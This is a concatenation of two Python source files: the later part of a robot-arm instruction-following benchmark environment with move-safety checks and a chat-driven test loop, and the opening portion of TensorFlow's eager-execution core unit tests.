lines = f.readlines()
test_cases = [Instruction(instruction=line.strip()) for line in lines]
return test_cases
def seed(self, seed: Optional[int] = None) -> List[Any]:
"""Sets the seed for this env's random number generator(s).
Note:
Some environments use multiple pseudorandom number generators.
We want to capture all such seeds used in order to ensure that
there aren't accidental correlations between multiple generators.
Args:
seed: A seed to be passed to np_random. If None, a random seed is used.
Returns:
list<bigint>: Returns the list of seeds used in this env's random
number generators. The first value in the list should be the
"main" seed, or the value which a reproducer should pass to
'seed'. Often, the main seed equals the provided 'seed', but
this won't be true if seed=None, for example.
"""
self._np_random, seed = seeding.np_random(seed)
return [seed]
def reset(self) -> core.Observation:
"""Resets the benchmark.
Returns:
Initial observation.
"""
self._high_level_instruction.set("")
self._low_level_instruction.set("")
super().reset()
print(f"{time.time()}: Resetting environment.")
observation, reward, _, info = self._end_test_case(reward=0, reset=True)
# Shuffle the test cases.
self._np_random.shuffle(self._long_horizon_instructions)
self._setup_state = SetupState.AWAIT_CLIENT
self._instr_num = 0
print(f"{time.time()}: Reset complete.")
return (observation, reward, False, info)
def _super_step(self, action: core.Action) -> StepReturn:
"""Calls super step and injects instructions into returned observation."""
observation, reward, done, info = super().step(action)
self._update_observation(observation)
return (observation, reward, done, info)
def step(self, action: core.Action) -> StepReturn:
"""Perform one step.
The observation will be None to indicate that the agent should exit.
Args:
action: The action to perform.
Returns:
A StepReturn tuple.
"""
observation: core.Observation = None
reward: float = 0.0
instr_done: bool = False
info: Any = None
# This is just the action, without the done action in it, and with a
# don't-change-task action in it.
stripped_action: core.Action = self._strip_action(action)
stripped_action = cast(Dict[str, Any], stripped_action)
stripped_action["task"] = {}
stripped_action["task"]["action"] = ReachTaskAction.NO_CHANGE
if self._setup_state == SetupState.AWAIT_CLIENT:
return self._start_test_case(reward, info)
# Check for various termination criteria.
reward, instr_done = self._check_for_done(action)
# instr_done is only set when the agent runs out of time or the agent
# indicates done, or the human at the chat client indicates done.
if instr_done:
self._setup_state = SetupState.AWAIT_CLIENT
self._instr_num += 1
print(f"{time.time()}: "
"Task completion criteria reached; closing out task.")
return self._end_test_case(reward, reset=False)
# If there's a new low-level instruction, issue an annotation for it
# and include it in the observation.
self._process_low_level_instr()
# Check the agent's action for board bounds or huge moves. Give a
# negative reward for such a move.
if not self._is_safe_move(stripped_action):
observation, _, _, info = self._super_step({})
return (observation, -1, False, info)
# Finally, issue the agent's action.
observation, reward, _, info = self._super_step(stripped_action)
return (observation, reward, False, info)
def _is_safe_move(self, action: core.Action) -> bool:
"""Determines if a servo move is a safe move."""
action = cast(Dict[str, Any], action)
pose: Optional[Pose]
if self._last_pose is None:
return True
if "arm" not in action:
return True
if "command" not in action["arm"]:
return True
if "servo" not in action["arm"]:
return True
if action["arm"]["servo"] != 1:
return True
if action["arm"]["command"] == ReachArmCommand.POSE:
p = action["arm"]["pose"]
if isinstance(p, list):
pose = Pose.from_list(p)
elif isinstance(p, tuple):
p = cast(Tuple[float, float, float, float, float, float], p)
pose = Pose.from_tuple(p)
elif isinstance(p, np.ndarray):
p = cast(np.ndarray, p)
pose = Pose.from_list(p.tolist())
else:
print(f"Warning: Unknown type for arm/pose: {type(p)}, "
"treating as safe.")
return True
elif action["arm"]["command"] == ReachArmCommand.JOINTS:
pose = self.fk("", action["arm"]["joints"])
if pose is None:
print("Warning: FK returned None, treating move as safe.")
return True
tr = pose.position
distx = (tr.x - self._last_pose[0])
dist = distx * distx
disty = (tr.y - self._last_pose[1])
dist += disty * disty
distz = (tr.z - self._last_pose[2])
dist += distz * distz
dist = math.sqrt(dist)
if dist > SAFE_SERVO_DIST_METERS:
print("Unsafe move denied: servo move would be "
f"{dist} > {SAFE_SERVO_DIST_METERS}")
return False
fudge = 0.01
if (tr.x < BOARD_X_LIMITS_METERS[0] - fudge or
tr.x > BOARD_X_LIMITS_METERS[1] + fudge):
print("Unsafe move denied: X position {tr.x} exceeds board limits")
return False
if (tr.y < BOARD_Y_LIMITS_METERS[0] - fudge or
tr.y > BOARD_Y_LIMITS_METERS[1] + fudge):
print("Unsafe move denied: Y position {tr.y} exceeds board limits")
return False
if (tr.z < BOARD_Z_LIMITS_METERS[0] - fudge or
tr.z > BOARD_Z_LIMITS_METERS[1] + fudge):
print("Unsafe move denied: Z position {tr.z} exceeds board limits")
return False
return True
def _check_for_done(self, action: core.Action) -> Tuple[float, bool]:
"""Checks for various termination criteria."""
# Did the agent indicate it's done?
action = cast(Dict[str, Any], action)
if "done" in action and action["done"] == 1:
print(f"{time.time()}: Agent indicated completion.")
self._timer_running = False
return (1.0, True)
# Did we run out of time?
if not self._disable_time_limit and time.time() >= self._deadline:
print(f"{time.time()}: You ran out of time!")
self._timer_running = False
return (-1.0, True)
# Did the chat client disconnect? The server is not alive if the client
# disconnected.
if self._chat_server and not self._chat_server.is_alive():
print(f"{time.time()}: Chat client disconnected, indicating completion.")
self._timer_running = False
return (1.0, True)
# Did the chat client send a ctrl-C?
if self._chat_client_indicated_end:
self._chat_client_indicated_end = False
print(f"{time.time()}: Chat client sent ctrl-C, indicating completion.")
self._timer_running = False
return (1.0, True)
return (0, False)
def _notify_low_level_instr(self, data: bytearray) -> None:
"""Puts a received low-level instruction onto the queue."""
self._low_level_queue.put(data.decode("utf-8", "ignore").rstrip("\x00"))
def _process_low_level_instr(self) -> None:
"""Handles a low-level instruction.
If a low-level instruction is present in the queue, pop if off, include
it in the observation, and send an annotation for it.
"""
low_level_instr: Optional[str] = None
try:
low_level_instr = self._low_level_queue.get_nowait()
except queue.Empty:
pass
if low_level_instr is not None:
if low_level_instr and ord(low_level_instr[0]) == 3: # ctrl-C
self._chat_client_indicated_end = True
return
self._low_level_instruction.set(low_level_instr)
self._annotate_short_horizon_instr(low_level_instr)
def _end_test_case(self, reward: float, reset: bool) -> StepReturn:
"""Runs cleanup after a test case is done.
The task is stopped, the arm is moved up and out of the way, the chat
server is stopped (if still running), the end of the test case is annotated,
and 'done' is set based on whether we need to run another test case or not.
Args:
reward: The reward to give to the agent.
reset: Whether we are ending the test case due to a reset.
Returns:
A StepReturn tuple.
"""
# Annotate the end of the test case (if this isn't total reset).
if not reset:
observation, _, _, info = self._annotate_end_of_test_case()
else:
observation, _, _, info = self._super_step({})
observation = cast(Dict[str, Any], observation)
# Move the arm up and out of the way:
# Get the current pose, set the z-height to the safe z-height, and
# synchronously move.
pose = observation["arm"]["pose"]
pose[2] = SAFE_Z_METERS
pose[3:] = TOOL_ORIENTATION_RADS
self._go_to(pose, preemptive=True)
# Move the arm to one corner.
pose[0] = CORNER_X_METERS
pose[1] = CORNER_Y_METERS
self._go_to(pose)
# Shut down the chat server if started.
if self._chat_server is not None:
self._chat_server.stop()
self._chat_server = None
observation, _, _, info = self._stop_task()
# Any more long-horizon instructions?
if self._instr_num == NUM_TEST_CASES:
return (observation, reward, True, info)
# Ignore what the agent wanted to do prior to done.
observation, _, _, info = self._super_step({})
return (observation, reward, False, info)
def _start_test_case(self, reward: float, info: Any) -> StepReturn:
"""Runs setup for a new test case.
Effectively suspends the agent until the blocks are placed in
their initial state. When the human is ready to go, issue the
long-horizon instruction.
The arm is moved up and out of the way first.
Args:
reward: The reward to give to the agent.
info: Any info to be passed to the agent.
Returns:
A StepReturn tuple.
"""
# See where the arm currently is.
observation, _, _, _ = self._super_step({})
observation = cast(Dict[str, Any], observation)
# Get the long-horizon instruction to work on.
instr = self._long_horizon_instructions[self._instr_num].instruction
# print(f"{time.time()}: Long-horizon instruction: {instr}")
# Start a chat server and await a connection.
self._chat_server = ChatServer(instr, self._notify_low_level_instr)
self._start_task()
# Drop the arm close to the table.
pose = observation["arm"]["pose"]
pose[2] = PUSH_Z_METERS
pose[3:] = TOOL_ORIENTATION_RADS
self._go_to(pose)
# Set the starting time for this test case.
self._test_case_begin_ts = time.time()
self._annotate_start_of_test_case()
self._annotate_long_horizon_instr(instr)
# Set the long-horizon instruction and clear the low-level queue.
self._high_level_instruction.set(instr)
self._low_level_instruction.set("")
while not self._low_level_queue.empty():
try:
_ = self._low_level_queue.get_nowait()
except queue.Empty:
pass
# Ignore what the agent wanted to do prior to setup.
observation, reward, done, info = self._super_step({})
# Start the timer running.
self._timer_running = True
self._deadline = time.time() + TIMEOUT_PER_TASK_SECONDS
self._setup_state = SetupState.ATTEMPTING_INSTRUCTION
return (observation, reward, done, info)
def _start_task(self) -> StepReturn:
"""Starts a task."""
task_action = collections.OrderedDict(
{"task": collections.OrderedDict(
{"action": ReachTaskAction.START})})
return self._super_step(task_action)
def _stop_task(self) -> StepReturn:
"""Stops a task."""
task_action = collections.OrderedDict(
{"task": collections.OrderedDict(
{"action": ReachTaskAction.STOP})})
return self._super_step(task_action)
def _annotate_long_horizon_instr(self, instr: str) -> StepReturn:
"""Sends an annotation for a long-horizon instruction.
The instruction is stripped of null bytes at the end, in case
there were any.
Args:
instr: The instruction to put in the annotation.
Returns:
A StepReturn tuple.
"""
annotation = logs_pb2.ClientAnnotation()
annotation.long_horizon_instruction.text = instr.rstrip("\x00")
return self._annotate(annotation)
def _annotate_short_horizon_instr(self, instr: str) -> StepReturn:
"""Sends an annotation for a short-horizon instruction.
The instruction is stripped of null bytes at the end, in case
there were any.
Args:
instr: The instruction to put in the annotation.
Returns:
A StepReturn tuple.
"""
annotation = logs_pb2.ClientAnnotation()
annotation.short_horizon_instruction.text = instr.rstrip("\x00")
return self._annotate(annotation)
def _annotate_start_of_test_case(self) -> StepReturn:
"""Sends an annotation for the start of the test case."""
annotation = logs_pb2.ClientAnnotation()
self._set_proto_timestamp(annotation.point_measurement.timestamp,
time.time())
annotation.point_measurement.space = ENV_ID
annotation.point_measurement.name = "test_case_begin_ts"
annotation.point_measurement.value.seconds = self._test_case_begin_ts
return self._annotate(annotation)
def _annotate_end_of_test_case(self) -> StepReturn:
"""Sends an annotation for the end of the test case.
Defined as when the arm moves out of the way, so that the
most recent image can show the board unoccluded.
Returns:
A StepReturn tuple.
"""
t = time.time() - self._test_case_begin_ts
annotation = logs_pb2.ClientAnnotation()
self._set_proto_timestamp(annotation.point_measurement.timestamp,
time.time())
annotation.point_measurement.space = ENV_ID
annotation.point_measurement.name = "test_case_time"
annotation.point_measurement.value.seconds = t
return self._annotate(annotation)
def _annotate(self, proto: logs_pb2.ClientAnnotation) -> StepReturn:
"""Sends an annotation using an action."""
self._set_proto_timestamp(proto.associated_server_ts, self._last_server_ts)
annotation_size = self.action_space["annotation"]["data"].shape[0]
bs = proto.SerializeToString()
enc = annotation_size * [256]
enc[:len(bs)] = bs
    enc_ndarray = np.array(enc, dtype=int)
action = {
"annotation": {
"disable": 0,
"data": enc_ndarray
}
}
return self._super_step(action)
def _set_proto_timestamp(self, ts: timestamp_pb2.Timestamp,
t: float) -> None:
"""Sets the timestamp in a proto."""
ts.seconds = int(t)
ts.nanos = int((t % 1) * 1e9)
def _go_to(self, pose: List[float], preemptive: bool = False) -> StepReturn:
"""Moves the arm synchronously to the given pose."""
action = collections.OrderedDict({
"arm":
collections.OrderedDict({
"command": 2,
"pose": pose,
"synchronous": 1,
"use_linear": 1,
"velocity": 0.7,
"preemptive": 1 if preemptive else 0,
})
})
return self._super_step(action)
def _go_to_joints(self, joints: List[float]) -> StepReturn:
"""Moves the arm synchronously to the given joint angles."""
action = collections.OrderedDict({
"arm":
collections.OrderedDict({
"command": 1,
"joint_angles": np.array(joints),
"synchronous": 1,
"use_linear": 1,
"velocity": 0.5,
})
})
return self._super_step(action)
def main(_: Any) -> None:
if flags.FLAGS.instructor:
ChatClient()
if __name__ == "__main__":
flags.DEFINE_bool("instructor", False, "Run as the instructor.")
app.run(main)
|
core_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import resource_variable_ops
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
class TFETest(test_util.TensorFlowTestCase):
def testContext(self):
ctx = context.Context()
self.assertTrue(ctx.executing_eagerly())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertEqual(context.SYNC, ctx.get_execution_mode())
ctx.set_execution_mode(context.ASYNC)
self.assertEqual(context.ASYNC, ctx.get_execution_mode())
ctx.set_execution_mode(context.SYNC)
self.assertEqual(context.SYNC, ctx.get_execution_mode())
with ctx.execution_mode(context.ASYNC):
self.assertEqual(context.ASYNC, ctx.get_execution_mode())
ctx.set_execution_mode(context.SYNC)
self.assertEqual(context.SYNC, ctx.get_execution_mode())
self.assertIsNone(ctx.summary_writer_resource)
ctx.summary_writer_resource = 'mock'
self.assertEqual('mock', ctx.summary_writer_resource)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testAsyncBasic(self):
ctx = context.Context(execution_mode=context.ASYNC)
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testRunMetadata(self):
context.enable_run_metadata()
t = constant_op.constant(1.0)
_ = t + t # Runs an operation which will be in the RunMetadata
run_metadata = context.export_run_metadata()
context.disable_run_metadata()
step_stats = run_metadata.step_stats
self.assertGreater(len(step_stats.dev_stats), 0)
cpu_stats = step_stats.dev_stats[0]
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
cpu_stats.device)
self.assertGreaterEqual(len(cpu_stats.node_stats), 1)
def testShouldCopy(self):
if not context.context().num_gpus():
self.skipTest('No devices other than CPUs found')
with ops.device('gpu:0'):
x = constant_op.constant(1.0)
y = array_ops.identity(x)
# The value we're testing y.device against will depend on what the behavior
# of not explicitly specifying a device in the context is. This behavior is
# subject to change (for example, in the future we may want to use GPUs, if
# available, when no device is explicitly provided)
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
def testContextSwitchStackContainsEagerMode(self):
# Eager execution has been enabled, and no other context switch has
# occurred, so `context_switches` should contain exactly one entry.
self.assertEqual(len(context.context().context_switches.stack), 1)
switch = context.context().context_switches.stack[0]
# The entry should log that eager mode was entered.
self.assertIs(switch.enter_context_fn, context.eager_mode)
# It is not possible to build a graph function when eager execution
# is enabled; the stack entry should reflect this fact.
self.assertFalse(switch.is_building_function)
def testInt32GPU(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
with ops.device('gpu:0'):
xent = nn_ops.sparse_softmax_cross_entropy_with_logits(
logits=[[0.0, 0.0]], labels=[0])
self.assertAllClose(xent, [0.69314718])
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.executing_eagerly(), ctx.scope_name, ctx.summary_writer_resource,
ctx.device_name,
ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
def testContextConfig(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
    self.assertEqual(0, ctx.num_gpus())
def testTensorPlacement(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
x = constant_op.constant(1.).gpu()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if t2 were not on GPU
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].cpu().numpy()
self.assertEqual(3, result)
def testResourceTensorPlacement(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
with context.device('gpu:0'):
v = resource_variable_ops.ResourceVariable(1.0)
with context.device('cpu:0'):
# Check that even though we specified the cpu device we'll run the read op
# in the device where the handle is.
self.assertAllEqual(
gen_resource_variable_ops.read_variable_op(v.handle, v.dtype), 1.0)
def testCopyBetweenDevices(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
def testCopyBetweenDevicesAsync(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
with context.execution_mode(context.ASYNC):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
context.async_wait()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
context.async_wait()
context.async_clear_error()
def testCopyScope(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
constant = constant_op.constant(1.0)
with ops.device('gpu:0'):
with context.context().device_policy(context.DEVICE_PLACEMENT_SILENT):
c = constant + 1.0
self.assertAllEqual(c, 2.0)
def testNumpyForceCPU(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.gpu()
self.assertAllEqual(c2g, cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.cpu()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta, tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(str)
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteBasicAsync(self):
with context.execution_mode(context.ASYNC):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
# Error: Invalid arguments
context.set_execution_mode(context.ASYNC)
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))
context.async_wait()
context.async_clear_error()
context.set_execution_mode(context.SYNC)
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteTooFewNumOutputs(self):
# num_outputs provided is 0, but one output is produced.
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'Mul',
num_outputs=0,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
def testMatMulGPU(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal)
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertAllEqual(7, total)
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3]]),
constant_op.constant([[5]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual([[15]], product)
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', 1, 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b)
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b)
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
    self.assertEqual(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
def testOperationWithNoInputsRunsOnDevice(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).gpu()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
def testConvertMixedEagerTensors(self):
array = np.zeros((), dtype=np.float32)
tensor = constant_op.constant(0., dtype=dtypes.float32)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
[array, tensor], context.context())
for typ, t in zip(types, tensors):
      self.assertEqual(typ, dtypes.float32)
self.assertIsInstance(t, ops.EagerTensor)
class SendRecvTest(test_util.TensorFlowTestCase):
cpu_device = '/job:localhost/replica:0/task:0/device:CPU:0'
def _send(self, tensor, tensor_name, to_device):
return execute(
b'_Send', num_outputs=0, inputs=[tensor],
attrs=('T', tensor.dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', tensor.device,
'send_device_incarnation', 0,
'recv_device', to_device,
'client_terminated', True))
def _recv(self, dtype, tensor_name, from_device):
device_name = context.context().device_name
if not device_name:
device_name = self.cpu_device
return execute(
b'_Recv', num_outputs=1, inputs=[],
attrs=('tensor_type', dtype.as_datatype_enum,
'tensor_name', tensor_name,
